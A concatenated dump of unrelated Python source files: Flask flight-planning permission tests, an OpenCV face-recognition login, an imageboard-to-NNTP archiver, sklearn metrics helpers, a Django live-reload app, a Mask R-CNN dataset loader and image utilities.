assert self.fm.get_change_content(all_changes[1]["id"]) == self.content1
def test_set_version_name(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
all_changes = self.fm.get_all_changes(operation.id, self.user)
assert self.fm.set_version_name(all_changes[1]["id"], operation.id, self.user.id, "THIS")
def test_undo(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
all_changes = self.fm.get_all_changes(operation.id, self.user)
assert self.fm.undo(all_changes[1]["id"], self.user)
def test_fetch_users_without_permission(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation9")
assert len(self.fm.fetch_users_without_permission(operation.id, self.user.id)) == 3
def test_fetch_users_with_permission(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation9")
assert self.fm.fetch_users_with_permission(operation.id, self.user.id) == []
def test_import_permission(self):
with self.app.test_client():
flight_path10, operation10 = self._create_operation(flight_path="operation10")
flight_path11, operation11 = self._create_operation(flight_path="operation11")
flight_path12, operation12 = self._create_operation(flight_path="operation12", user=self.anotheruser)
flight_path13, operation13 = self._create_operation_with_users(flight_path="operation13")
flight_path14, operation14 = self._create_operation_with_users(flight_path="operation14")
flight_path15, operation15 = self._create_operation_with_opposite_permissions(flight_path="operation15")
# equal permissions, nothing to do
result = (False, None, 'Permissions are already given')
assert self.fm.import_permissions(operation10.id, operation11.id, self.user.id) == result
# no admin rights
result = (False, None, 'Not an admin of this operation')
assert self.fm.import_permissions(operation10.id, operation12.id, self.user.id) == result
# not a member
result = (False, None, 'Not a member of this operation')
assert self.fm.import_permissions(operation12.id, operation10.id, self.user.id) == result
# we add to op8 all users of op11
result = (True, {'add_users': [self.vieweruser.id, self.collaboratoruser.id],
'delete_users': [],
'modify_users': []}, 'success')
assert self.fm.import_permissions(operation13.id, operation10.id, self.user.id) == result
# we remove all users from op8 which are not in op9
result = (True, {'add_users': [],
'delete_users': [self.vieweruser.id, self.collaboratoruser.id],
'modify_users': []}, 'success')
assert self.fm.import_permissions(operation11.id, operation10.id, self.user.id) == result
# we modify access level
result = (True, {'add_users': [],
'delete_users': [],
'modify_users': [self.vieweruser.id, self.collaboratoruser.id]}, 'success')
assert self.fm.import_permissions(operation15.id, operation14.id, self.user.id) == result
def _example_data(self):
self.content1 = """\
<?xml version="1.0" encoding="utf-8"?>
<FlightTrack>
<Name>new flight track (1)</Name>
<ListOfWaypoints>
<Waypoint flightlevel="0.0" lat="55.15" location="B" lon="-23.74">
<Comments>Takeoff</Comments>
</Waypoint>
<Waypoint flightlevel="350" lat="42.99" location="A" lon="-12.1">
<Comments></Comments>
</Waypoint>
<Waypoint flightlevel="380.0" lat="52.785" location="Shannon" lon="-8.925">
<Comments>Dive</Comments>
</Waypoint>
<Waypoint flightlevel="400.0" lat="48.08" location="EDMO" lon="11.28">
<Comments></Comments>
</Waypoint>
<Waypoint flightlevel="0.0" lat="63.74" location="C" lon="1.73">
<Comments>Landing</Comments>
</Waypoint>
</ListOfWaypoints>
</FlightTrack>"""
self.content2 = """\
<?xml version="1.0" encoding="utf-8"?>
<FlightTrack>
<Name>new flight track (1)</Name>
<ListOfWaypoints>
<Waypoint flightlevel="0.0" lat="55.15" location="B" lon="-23.74">
<Comments>Takeoff</Comments>
</Waypoint>
<Waypoint flightlevel="350" lat="42.99" location="A" lon="-12.1">
<Comments></Comments>
</Waypoint>
</ListOfWaypoints>
</FlightTrack>"""
def _create_operation(self, flight_path="firstflight", user=None, content=None):
if user is None:
user = self.user
self.fm.create_operation(flight_path, f"info about {flight_path}", user, content=content)
operation = Operation.query.filter_by(path=flight_path).first()
return flight_path, operation
def _create_operation_with_users(self, flight_path="firstflight", user=None, content=None):
if user is None:
user = self.user
self.fm.create_operation(flight_path, f"info about {flight_path}", user, content=content)
operation = Operation.query.filter_by(path=flight_path).first()
self.fm.add_bulk_permission(operation.id, self.user, [self.vieweruser.id], "viewer")
self.fm.add_bulk_permission(operation.id, self.user, [self.collaboratoruser.id], "collaborator")
return flight_path, operation
def _create_operation_with_opposite_permissions(self, flight_path="firstflight", user=None, content=None):
if user is None:
user = self.user
self.fm.create_operation(flight_path, f"info about {flight_path}", user, content=content)
operation = Operation.query.filter_by(path=flight_path).first()
self.fm.add_bulk_permission(operation.id, self.user, [self.vieweruser.id], "collaborator")
self.fm.add_bulk_permission(operation.id, self.user, [self.collaboratoruser.id], "viewer")
return flight_path, operation
| StarcoderdataPython |
9780034 | <gh_stars>0
import cv2
import numpy as np
import sys
import requests
import os
import alerts
import datetime
import time
def captures(names):
file1=open("admin_files/logs.txt","a+")
file2=open("admin_files/mobile_no.txt","r")
data=file2.read()
file2.close()
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read('trainer.yml')
cascadePath = 'haarcascade_frontalface_default.xml'
faceCascade = cv2.CascadeClassifier(cascadePath)
font = cv2.FONT_HERSHEY_SIMPLEX
id = 0
cam = cv2.VideoCapture(0)
#Variable to counter valid and invalid
valid=0
invalid=0
flag=0
while (flag==0):
ret, img =cam.read()
img = cv2.flip(img, 1)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor = 1.2,
minNeighbors = 3,
minSize=(10,10)
)
for(x,y,w,h) in faces:
cv2.rectangle(img, (x,y), (x+w,y+h), (0,0,255), 2)
id, confidence = recognizer.predict(gray[y:y+h,x:x+w])
text=""
if(confidence<50):
valid+=1
text=names[id]
if(valid>=60):
cv2.putText(img, str("Logged to system"), (x+5,y-5), font, 1, (255,255,255), 2)
cv2.putText(img, str("Paused for few minutes.."), (x+5,y+5+270), font, 1, (255,255,255), 2)
cv2.imshow('camera',img)
if cv2.waitKey(1) &0xFF == ord('q'):
flag=1
break
x=datetime.datetime.now()
x=x.strftime("%m/%d/%Y, %H:%M:%S")
msg="\n "+text+" logged at "+x
file1.write(msg)
valid=0
invalid=0
time.sleep(3)
else:
cv2.putText(img, str("Detected "+text), (x+5,y-5), font, 1, (255,255,255), 2)
cv2.imshow('camera',img)
if cv2.waitKey(1) &0xFF == ord('q'):
flag=1
break
else:
invalid+=1
if(invalid>=150):
cv2.putText(img, str("Cannot detect the face system will be alerted.."), (x+5,y-5), font, 1, (255,255,255), 2)
cv2.imshow('camera',img)
if cv2.waitKey(1) &0xFF == ord('q'):
flag=1
break
alerts.alert(data)
invalid=0
valid=0
else:
cv2.putText(img, str("Detecting.."), (x+5,y-5), font, 1, (255,255,255), 2)
cv2.imshow('camera',img)
if cv2.waitKey(1) &0xFF == ord('q'):
flag=1
break
cv2.imshow('camera',img)
if cv2.waitKey(1) &0xFF == ord('q'):
break
cam.release()
cv2.destroyAllWindows()
file1.close()
| StarcoderdataPython |
4948845 | #!/usr/bin/env python3.4
import requests
from bs4 import BeautifulSoup as BS
import datetime
import io
import nntplib
import time
import urllib.parse
import base64
import random
class Article:
"""
an nntp article
"""
timeFormat = '%a, %d %b %Y %H:%M:%S +0000'
def __init__(self, j, board, site):
"""
construct article
:param j: json object
"""
self.j = j
self.board = board
self.site = site
self.messageID = self.genMessageID(j['no'])
def formatDate(self):
return datetime.datetime.utcfromtimestamp(self.j['time']).strftime(self.timeFormat)
def message(self):
m = ''
# for each line
for p in BS(self.j['com']).find_all('p'):
# clean it
m += p.text
m += '\n'
if len(m.rstrip('\n')) > 0:
return m
def subject(self):
if 'subject' in self.j:
return self.j['subject']
def name(self):
return self.j['name']
def group(self):
return 'overchan.archive.{}.{}'.format(self.site, self.board)
def genMessageID(self, no):
return '<{}.{}@{}>'.format(self.board, no, self.site)
def header(self):
hdr = ("Subject: {}\n"+\
"From: {} <<EMAIL>>\n"+\
"Date: {}\n"+\
"Newsgroups: {}\n"+\
"Message-ID: {}\n"+\
"Path: {}\n").format(self.subject(), self.name(), self.formatDate(), self.group(), self.messageID, self.site)
if self.j['resto'] > 0:
hdr += "References: {}\n".format(self.genMessageID(self.j['resto']))
if 'filename' in self.j:
hdr += 'Mime-Version: 1.0\n'
hdr += 'Content-Type: multipart/mixed; boundary="{}"\n'.format(self.boundary)
else:
hdr += 'Content-Type: text/plain; encoding="UTF-8"\n'
return hdr
def bodyPlain(self):
msg = self.message()
if msg:
return "{}\n{}".format(self.header(), msg)
def getAttachmentPart(self, j):
msg = ''
mtype = 'image'
if j['ext'] in ['.mp4', '.webm']:
mtype = 'video'
url = 'https://{}/{}/src/{}{}'.format(self.site, self.board, j['tim'], j['ext'])
print ('obtain {}'.format(url))
r = requests.get(url)
if r.status_code == 200:
msg += '--{}\n'.format(self.boundary)
msg += 'Content-Type: {}/{}\n'.format(mtype, j['ext'])
msg += 'Content-Disposition: form-data; filename="{}{}"; name="import"\n'.format(j['filename'], j['ext'])
msg += 'Content-Transfer-Encoding: base64\n'
msg += '\n'
msg += base64.b64encode(r.content).decode('ascii')
msg += '\n'
else:
print ('failed to obtain attachment: {} != 200'.format(r.status_code))
return msg
def bodyMultipart(self):
self.boundary = '========{}'.format(random.randint(0, 10000000))
msg = self.header() + '\n'
msg += '--{}\n'.format(self.boundary)
msg += 'Content-Type: text/plain; encoding=UTF-8\n'
msg += '\n'
msg += self.message() + '\n'
msg += self.getAttachmentPart(self.j)
if 'extra_files' in self.j:
for j in self.j['extra_files']:
msg += self.getAttachmentPart(j)
msg += '\n--{}--\n'.format(self.boundary)
return msg
def body(self):
if 'filename' in self.j:
return self.bodyMultipart()
else:
return self.bodyPlain()
class Poster:
def __init__(self, host, port, user, passwd):
self.host, self.port = host, port
self.user, self.passwd = user, passwd
def post(self, articles):
"""
post 1 or more articles
"""
if isinstance(articles, Article):
return self.post([articles])
else:
n = nntplib.NNTP(self.host, self.port, self.user, self.passwd)
for article in articles:
body = article.body()
if body:
print("posting {}".format(article.messageID))
try:
body = io.BytesIO(body.encode('utf-8'))
n.ihave(article.messageID, body)
except Exception as e:
print('failed: {}'.format(e))
n.quit()
def url_parse(url):
return urllib.parse.urlparse(url)
class Getter:
def __init__(self, url):
self.url = url
self.site = url_parse(url).hostname
self.board = url_parse(url).path.split('/')[1]
def get(self, thread=False):
"""
yield a bunch of articles
"""
r = requests.get(self.url)
if r.status_code == 200:
try:
j = r.json()
except:
pass
else:
if thread:
if 'posts' in j:
for post in j['posts']:
yield Article(post, self.board, self.site)
else:
if 'threads' in j:
for t in j['threads']:
posts = t['posts']
for post in posts:
yield Article(post, self.board, self.site)
def main():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('--server', type=str, required=True)
ap.add_argument('--port', type=int, required=True)
ap.add_argument('--board', type=str, required=True)
ap.add_argument('--thread', type=str, required=False)
ap.add_argument('--user', type=str, required=True)
ap.add_argument('--passwd', type=str, requried=True)
args = ap.parse_args()
poster = Poster(args.server, args.port, args.user, args.passwd)
if args.thread:
# only archive 1 thread
getter = Getter('https://8ch.net/{}/res/{}.json'.format(args.board, thread))
poster.post(getter.get(thread=True))
else:
# archive the entire board
for n in range(10):
getter = Getter('https://8ch.net/{}/{}.json'.format(args.board, n))
poster.post(getter.get())
if __name__ == "__main__":
main()
| StarcoderdataPython |
1655973 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 18 14:44:44 2021
@author: <NAME>
"""
from sklearn.metrics import explained_variance_score
from sklearn.metrics import r2_score
from sklearn.metrics import max_error
from sklearn.metrics import accuracy_score
from sklearn.metrics import roc_auc_score
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import average_precision_score
from statsmodels.stats.outliers_influence import variance_inflation_factor
import numpy as np
import pandas as pd
import logging
class _Tool():
def KS(y_true,y_hat,sample_weight=None):
if isinstance(y_true,np.ndarray):
y_true=pd.Series(y_true)
if sample_weight is None:
sample_weight=pd.Series(np.ones_like(y_true),index=y_true.index)
if isinstance(y_hat,np.ndarray):
y_hat = pd.Series(y_hat,index=y_true.index)
sample_weight.name='sample_weight'
y_true.name='y'
y_hat.name='score'
df = pd.concat([y_hat,y_true,sample_weight],axis=1)
df['y_mutli_w']=df['y']*df['sample_weight']
total = df.groupby(['score'])['sample_weight'].sum()
bad = df.groupby(['score'])['y_mutli_w'].sum()
all_df = pd.DataFrame({'total':total, 'bad':bad})
all_df['good'] = all_df['total'] - all_df['bad']
all_df.reset_index(inplace=True)
all_df = all_df.sort_values(by='score',ascending=False)
all_df['badCumRate'] = all_df['bad'].cumsum() / all_df['bad'].sum()
all_df['goodCumRate'] = all_df['good'].cumsum() / all_df['good'].sum()
ks = all_df.apply(lambda x: x.goodCumRate - x.badCumRate, axis=1)
return np.abs(ks).max()
def vif(df):
vif = pd.DataFrame()
vif['features'] = df.columns
if df.shape[1]>1:
vif['VIF Factor'] = [variance_inflation_factor(df.values, i) for i in range(df.shape[1])]
else:
vif['VIF Factor']=0
vif = vif.sort_values('VIF Factor',ascending=False)
return vif
def make_logger(logger_name,logger_file):
logger = logging.getLogger(logger_name)
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(logger_file,mode='w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(name)s]-[%(filename)s-%(lineno)d]-[%(processName)s]-[%(asctime)s]-[%(levelname)s]: %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger,fh
SCORERS = dict(
r2=r2_score,
explained_variance_score=explained_variance_score,
max_error = max_error,
accuracy=accuracy_score,
roc_auc=roc_auc_score,
balanced_accuracy=balanced_accuracy_score,
average_precision=average_precision_score,
ks=_Tool.KS) | StarcoderdataPython |
1989862 | import os
import json
from collections import defaultdict
from bs4 import BeautifulSoup
files = ['test_2.html', 'test_3.html', 'test_4.html', 'test_5.html']
questions = []
answers = defaultdict(list)
question_index = 0
for _file in files:
question_index = len(questions)
with open(_file, 'r') as f:
content = f.read()
soup = BeautifulSoup(content)
for item in soup.find_all('p', style="font-weight:bold;"):
questions.append(item.get_text())
for item in soup.find_all('div', class_="blockindent4"):
question_id = item.input.attrs['name'].split('q')[1]
is_correct_answer = not 'incorrect' in item.input.attrs['onclick']
answers[question_index + int(question_id)].append((item.get_text(), is_correct_answer))
data = {}
for index, question in enumerate(questions):
data[index] = {"question": question, "answers": answers[index+1]}
json_file = open('../class-c-questions.json', 'w+')
json_data = json.dumps(data, sort_keys=True, indent=2)
json_file.write(json_data)
| StarcoderdataPython |
6638279 | <reponame>phplaboratory/madcore-ai
from __future__ import print_function
import os
import sys
from utils import run_cmd
NAMESPACE = 'spark-cluster'
SPARK_PATH = '/opt/spark'
# TODO@geo validate this
sparks_args = sys.argv[1]
# this can be
app_file_name = sys.argv[2]
app_args = sys.argv[3]
example_subfold = None
if app_file_name.endswith('.py'):
example_file_path = os.path.join(SPARK_PATH, 'examples/src/main/python', app_file_name)
else:
# Load jar files with examples
example_file_path = os.path.join(SPARK_PATH, 'lib', app_file_name)
zepplin_controller = run_cmd(
"kubectl get pods --namespace=%s | grep zeppelin-controller | awk '{print $1}'" % (NAMESPACE,))
run_spark_job_cmd = "kubectl exec -i {pod_name} --namespace={namespace} -ti -- " \
"spark-submit --master=spark://spark-master:7077 {sparks_args} {spark_file} {app_args}"
run_spark_job = run_spark_job_cmd.format(pod_name=zepplin_controller, namespace=NAMESPACE, sparks_args=sparks_args,
spark_file=example_file_path, app_args=app_args)
if __name__ == '__main__':
print(run_cmd(run_spark_job))
| StarcoderdataPython |
1796812 | <reponame>kezabelle/django-livereloadish<filename>livereloadish/apps.py
import logging
import os
import pickle
import time
import pathlib
from collections import namedtuple
from datetime import datetime, timezone
from hashlib import sha1
from tempfile import gettempdir
from typing import Dict, Literal, Optional
from asgiref.local import Local
from django.apps import AppConfig, apps
from django.conf import settings
from django.core.checks import register, Warning
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
from django.dispatch import receiver
from django.utils.autoreload import (
DJANGO_AUTORELOAD_ENV,
autoreload_started,
BaseReloader,
)
from django.utils.functional import cached_property
from livereloadish.patches import (
do_patch_static_serve,
do_patch_engine_find_template,
do_patch_staticnode_url,
do_patch_filesystemstorage_url,
do_patch_extendsnode_get_parent,
do_patch_template_compile_nodelist,
)
__all__ = ["logger", "Seen", "LiveReloadishConfig"]
logger = logging.getLogger(__name__)
def check_for_default_middleware(app_configs, **kwargs):
try:
from django.conf import settings
mws = settings.MIDDLEWARE
except Exception:
return []
if "livereloadish.middleware.LivereloadishMiddleware" not in mws:
return [
Warning(
msg="Unable to find default Livereloadish middleware, unless "
"you've subclassed and replaced it, live-reloading won't work",
hint="Add 'livereloadish.middleware.LivereloadishMiddleware' to your settings.MIDDLEWARE",
obj=None,
id="livereloadish.W001",
)
]
return []
class Seen(
namedtuple(
"Seen",
("relative_path", "absolute_path", "filename", "mtime", "requires_full_reload"),
)
):
def mtime_as_utc_date(self):
return datetime.fromtimestamp(self.mtime, timezone.utc)
def _asdict(self):
return {
"relative_path": self.relative_path,
"absolute_path": self.absolute_path,
"filename": self.filename,
"mtime": self.mtime,
"mtime_iso": self.mtime_as_utc_date().isoformat(),
"requires_full_reload": self.requires_full_reload,
}
class LiveReloadishConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "livereloadish"
label = "livereloadish"
# Assuming multiple projects, and each one is a separate venv, is probably enough...
lockfile: str = sha1(os.path.dirname(__file__).encode("utf-8")).hexdigest()
# How long before a file (either the lockfile or the individual entries therein)
# is considered stale, in seconds.
stale_after: int = 60 * 15
# Sleep durations for the SSE connection
sleep_quick = 0.35
sleep_slow = 1.0
# This is intentionally mutable, fwiw.
# It's also in a precise order, being that dicts are insertion ordered nowawdays.
# CSS is most likely to change, then templates (which /may/ be a partial reload)
# then finally JS which is most likely a full page reload (cos I ain't implemented
# any form of module.hot style accept/reject) to throw away state and keep things
# lovely and stateless.
# And then a bunch of stuff where there may not be a specific reliable
# strategy (eg: images. Easy enough to replace <img> but then what about <picture>
# and srcset and CSS backgrounds etc)
seen: Dict[str, Dict[str, Seen]] = {
"text/css": {},
"text/html": {},
"application/xhtml+xml": {},
"text/javascript": {},
"application/javascript": {},
"image/png": {},
"image/jpeg": {},
"image/svg+xml": {},
"image/webp": {},
"image/gif": {},
"font/ttf": {},
"font/woff": {},
"font/woff2": {},
"text/x-python": {},
"application/x-python-code": {},
"text/markdown": {},
# "application/json": {},
}
during_request = Local()
django_reloader: Optional[BaseReloader] = None
def ready(self) -> bool:
register("middleware")(check_for_default_middleware)
if not self._should_be_enabled():
logger.debug("Livereloadish is not applying patches")
return False
logger.info("Livereloadish applying patches for the process")
return all(
(
do_patch_static_serve(),
do_patch_template_compile_nodelist(),
do_patch_engine_find_template(),
do_patch_filesystemstorage_url(),
do_patch_staticnode_url(),
do_patch_extendsnode_get_parent(),
self.load_from_lockfile(),
)
)
def add_to_seen(
self,
content_type: str,
relative_path: str,
absolute_path: str,
mtime: float,
requires_full_reload: bool,
) -> Literal[True]:
self.seen[content_type][absolute_path] = Seen(
relative_path,
absolute_path,
os.path.basename(relative_path),
mtime,
requires_full_reload,
)
# Disabled for now ...
if 0 and self.django_reloader is not None:
# Apparently the modern reloader literally doesn't support str paths,
# only Path instances. boo.
#
# mtime = file.stat().st_mtime
# AttributeError: 'str' object has no attribute 'stat'
#
# Note that I can't see a way to determine if the file being changed
# is already present in either directory_globs or iter_all_python_module_files
# so I think doing it this way introduces the possibility that it's
# stat'd twice or thrice? Although it may get amortized down into one
# value based on snapshot_files()'s seen_files or tick's mtimes?
self.django_reloader.extra_files.add(pathlib.Path(absolute_path))
return True
@cached_property
def lockfile_storage(self) -> FileSystemStorage:
return FileSystemStorage(
location=os.path.join(gettempdir(), "livereloadish"),
base_url=None,
)
def _should_be_enabled(self) -> bool:
return (
settings.DEBUG is True
and os.environ.get(DJANGO_AUTORELOAD_ENV, "false") == "true"
)
def load_from_lockfile(self) -> bool:
if not self._should_be_enabled():
logger.debug("Livereloadish skipping loading previously seen file cache")
return False
if not self.lockfile_storage.exists(self.lockfile):
logger.debug("Livereloadish has no previously seen file cache")
return False
lockfile_path = self.lockfile_storage.path(self.lockfile)
last_modified = os.path.getmtime(lockfile_path)
# If it's there but older than we'd like, assume a refresh is needed
# to collect files to watch.
if last_modified < (time.time() - self.stale_after):
logger.info(
"Livereloadish has a stale cache of seen files: %s", lockfile_path
)
return False
with self.lockfile_storage.open(self.lockfile) as f:
try:
self.seen = pickle.loads(f.read())
except EOFError:
logger.warning(
"Livereloadish previously seen files cache is corrupt: %s",
lockfile_path,
)
except TypeError:
logger.warning(
"Livereloadish previously seen files cache contains out of date datastructures: %s",
lockfile_path,
)
else:
file_count = sum(len(values) for values in self.seen.values())
logger.debug(
"Livereloadish %s previously seen files are being tracked from cache (< 15 minutes old): %s",
file_count,
lockfile_path,
)
return True
def dump_to_lockfile(self) -> bool:
if not self._should_be_enabled():
logger.debug("Livereloadish skipping dumping previously seen file cache")
return False
file_count = sum(len(values) for values in self.seen.values())
logger.debug(
"Livereloadish dumping %s previously seen files to cache: %s",
file_count,
self.lockfile_storage.path(self.lockfile),
)
try:
self.lockfile_storage.delete(self.lockfile)
self.lockfile_storage.save(
self.lockfile, ContentFile(pickle.dumps(self.seen))
)
except FileNotFoundError as e:
logger.debug(
"Failed to dump %s files into previously seen file cache, lockfile was swept away probably",
file_count,
exc_info=e,
)
# Delete the cached_property to try again at getting the temp dir.
# Because it could've technically changed...
if "lockfile_storage" in self.__dict__:
self.__dict__.pop("lockfile_storage")
return False
except OSError as e:
logger.debug(
"Failed to dump %s files into previously seen file cache for an unknown reason",
file_count,
exc_info=e,
)
# Delete the cached_property to try again at getting the temp dir.
# Because it could've technically changed...
if "lockfile_storage" in self.__dict__:
self.__dict__.pop("lockfile_storage")
return False
return True
@receiver(autoreload_started, dispatch_uid="livereloadish_reloader-connected")
def save_reloader_to_appconfig(sender, signal, **kwargs):
"""
I can't see a way to actually get a reference to the reloader in use within
the autoreload module, nor anywhere in the stack frame history, so let's
just patch one the heck in manually.
"""
try:
appconf = apps.get_app_config("livereloadish")
except LookupError:
return None
else:
appconf.django_reloader = sender
| StarcoderdataPython |
3492764 | from os import listdir, path
from xml.etree import ElementTree
import numpy as np
from mrcnn.utils import Dataset
class ISRLHumanDatasetManager(Dataset):
def load_dataset(self, dataset_dir, dataset_type="train"):
self.add_class("dataset", 1, "human")
images_dir = dataset_dir + '/color/'
annotations_dir = dataset_dir + '/annotations_voc_xml/'
image_id_list = []
image_path_list = []
annotation_path_list = []
for filename in listdir(images_dir):
image_id = filename[:-4]
image_path = images_dir + filename
annotation_path = annotations_dir + image_id + '.xml'
# bad depth images in the beginning
if int(image_id) < 16:
continue
# Boxes are not in all images
if not path.exists(annotation_path):
continue
image_id_list.append(image_id)
image_path_list.append(image_path)
annotation_path_list.append(annotation_path)
indices = np.arange(len(image_id_list))
threshold1 = round(len(image_id_list) * 0.7)
threshold2 = round(len(image_id_list) * 0.9)
np.random.seed(1)
np.random.shuffle(indices)
if dataset_type == "train":
indices = indices[:threshold1]
elif dataset_type == "val":
indices = indices[threshold1:threshold2]
else:
indices = indices[threshold2:]
print("Indices:", indices)
for i in indices:
self.add_image('dataset', image_id=image_id_list[i], path=image_path_list[i], annotation=annotation_path_list[i])
def get_boxes(self, path):
root = ElementTree.parse(path).getroot()
image_boxes = list()
for box in root.findall('.//bndbox'):
xmin = int(box.find('xmin').text)
ymin = int(box.find('ymin').text)
xmax = int(box.find('xmax').text)
ymax = int(box.find('ymax').text)
image_boxes.append([xmin, ymin, xmax, ymax])
image_width = int(root.find('.//size/width').text)
image_height = int(root.find('.//size/height').text)
return image_boxes, image_width, image_height
def load_mask(self, image_id):
info = self.image_info[image_id]
path = info['annotation']
image_boxes, image_width, image_height = self.get_boxes(path)
boxes_number = len(image_boxes)
masks = np.zeros([image_height, image_width, boxes_number], dtype='uint8')
class_ids = []
for i in range(boxes_number):
box = image_boxes[i]
start_row, end_row = box[1], box[3]
start_column, end_column = box[0], box[2]
masks[start_row:end_row, start_column:end_column, i] = 1
class_ids.append(self.class_names.index('human'))
return masks, np.asarray(class_ids, dtype='int32')
def image_reference(self, image_id):
info = self.image_info[image_id]
return info['path']
| StarcoderdataPython |
5065646 | <gh_stars>1-10
import pandas as pd
from time import time
from math import sqrt
import matplotlib.pyplot as plt
import datetime
import sys
sys.path.insert(0,'APM/BIN/')
# Import real time contingencies assessment
from ST_AM_Contingencies_Analysis import Real_Time_Contingencies as RTC_A
from ST_AM_Contingencies_Ploty import Plot_All_Days_Hour_Data
from ST_AM_Contingencies_Ploty import Plot_Stack
# Performance assessment Settings
file_tags = 'APM/DATA/IEEE39_Asset_Data.xlsx'
asset_portfolio_source = 'APM/DATA/IEEE39_Asset_Data.xlsx'
net_file = 'APM/DATA/IEEE39NODES.xlsx'
date_beg = datetime.datetime(2020, 1, 1,1)
load_growth = 0.02 # Assumed load growth per year
h_end = 5*24*365 # Assumed period of planning
case_settings = {
'portfolio_source': 'CASES/01_ENERCA/ENERCA_Asset_Portfolio.xlsx',
'database_sett': 'CASES/01_ENERCA/ENERCA_DB_Model.json'
}
# Project data
report_data = {
"Name" : 'Asset Management',
"Sub_title" : 'APM - Fleet Performance'
}
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# Normal Operating conditions #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Create contingencies assessment object
Cont_A = RTC_A(net_file,file_tags)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# Historical records of condition #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Porfolio assessment
from APM_Module import APM
#Assets = APM(asset_portfolio_source,load_growth)
Assets = APM(case_settings,load_growth)
# Generate report
from R1_Reports import Test_Report_AP
Test_Report_AP(report_data,Assets) | StarcoderdataPython |
6533831 | from django import forms
from .models import Lost
from .models import Found
from django.forms import ModelForm
class LostForm(ModelForm):
class Meta:
model = Lost
fields = ['Item_Name','Item_Image','Description','Last_Seen']
class FoundForm(ModelForm):
class Meta:
model = Found
fields=['Item_Name','Item_Image','Description','Found_on'] | StarcoderdataPython |
1777125 | <reponame>rockwolf/python
#!/usr/local/bin/python
"""
See LICENSE file for copyright and license details.
"""
from database.databaseaccess import DatabaseAccess
from database.mappings import *
from modules.core_module import CoreModule
from modules.statement import Statement
from modules.function import *
from modules.constant import *
from generic.modules.function import *
class CurrencyExchange(CoreModule):
"""
CurrencyExchange class.
"""
def __init__(self, config):
"""
Init
"""
self.config = config
def create_statements(self, input_fields):
"""
Creates the records needed for Table.CURRENCY_EXCHANGE.
"""
try:
dba = DatabaseAccess(self.config)
statement_currency_exchange = Statement(T_CURRENCY_EXCHANGE)
date_created = current_date()
date_modified = current_date()
records = 0
for fields in input_fields:
records = records + 1
#NOTE: we don't need to query, because we always add a new
#currency_exchange line. The same value can be used multiple
#times, so it's not possible to query if one already exists.
statement_currency_exchange.add(
records,
{
'currency_exchange_id': None,
'currency_from_id': dba.currency_id_from_currency(
fields[Input.CURRENCY_FROM]),
'currency_to_id': dba.currency_id_from_currency(
fields[Input.CURRENCY_TO]),
'exchange_rate': Decimal(fields[Input.EXCHANGE_RATE]),
'date_created': date_created,
'date_modified': date_modified
}
)
return statement_currency_exchange
except Exception as ex:
print Error.CREATE_STATEMENTS_TABLE_CURRENCY_EXCHANGE, ex
finally:
dba = None
| StarcoderdataPython |
1614012 | <reponame>fish2000/pilkit<filename>pilkit/utils.py<gh_stars>1-10
import os
import mimetypes
import sys
from io import UnsupportedOperation
from .exceptions import UnknownExtension, UnknownFormat
from .lib import Image, ImageFile, StringIO, string_types
RGBA_TRANSPARENCY_FORMATS = ['PNG']
PALETTE_TRANSPARENCY_FORMATS = ['PNG', 'GIF']
DEFAULT_EXTENSIONS = {
'JPEG': '.jpg',
'PNG': '.png',
}
def img_to_fobj(img, format, autoconvert=True, **options):
return save_image(img, StringIO(), format, options, autoconvert)
def open_image(target):
target.seek(0)
return Image.open(target)
_pil_init = 0
def _preinit_pil():
"""Loads the standard PIL file format drivers. Returns True if ``preinit()``
was called (and there's a potential that more drivers were loaded) or False
if there is no possibility that new drivers were loaded.
"""
global _pil_init
if _pil_init < 1:
Image.preinit()
_pil_init = 1
return True
return False
def _init_pil():
"""Loads all PIL file format drivers. Returns True if ``init()`` was called
(and there's a potential that more drivers were loaded) or False if there is
no possibility that new drivers were loaded.
"""
global _pil_init
_preinit_pil()
if _pil_init < 2:
Image.init()
_pil_init = 2
return True
return False
def _extension_to_format(extension):
return Image.EXTENSION.get(extension.lower())
def _format_to_extension(format):
if format:
format = format.upper()
if format in DEFAULT_EXTENSIONS:
ext = DEFAULT_EXTENSIONS[format]
# It's not enough for an extension to be listed in
# ``DEFAULT_EXTENSIONS``, it must also be recognized by PIL.
if ext in Image.EXTENSION:
return ext
for k, v in Image.EXTENSION.items():
if v == format:
return k
return None
def extension_to_mimetype(ext):
try:
filename = 'a%s' % (ext or '') # guess_type requires a full filename, not just an extension
mimetype = mimetypes.guess_type(filename)[0]
except IndexError:
mimetype = None
return mimetype
def format_to_mimetype(format):
return extension_to_mimetype(format_to_extension(format))
def extension_to_format(extension):
"""Returns the format that corresponds to the provided extension.
"""
format = _extension_to_format(extension)
if not format and _preinit_pil():
format = _extension_to_format(extension)
if not format and _init_pil():
format = _extension_to_format(extension)
if not format:
raise UnknownExtension(extension)
return format
def format_to_extension(format):
"""Returns the first extension that matches the provided format.
"""
extension = None
if format:
extension = _format_to_extension(format)
if not extension and _preinit_pil():
extension = _format_to_extension(format)
if not extension and _init_pil():
extension = _format_to_extension(format)
if not extension:
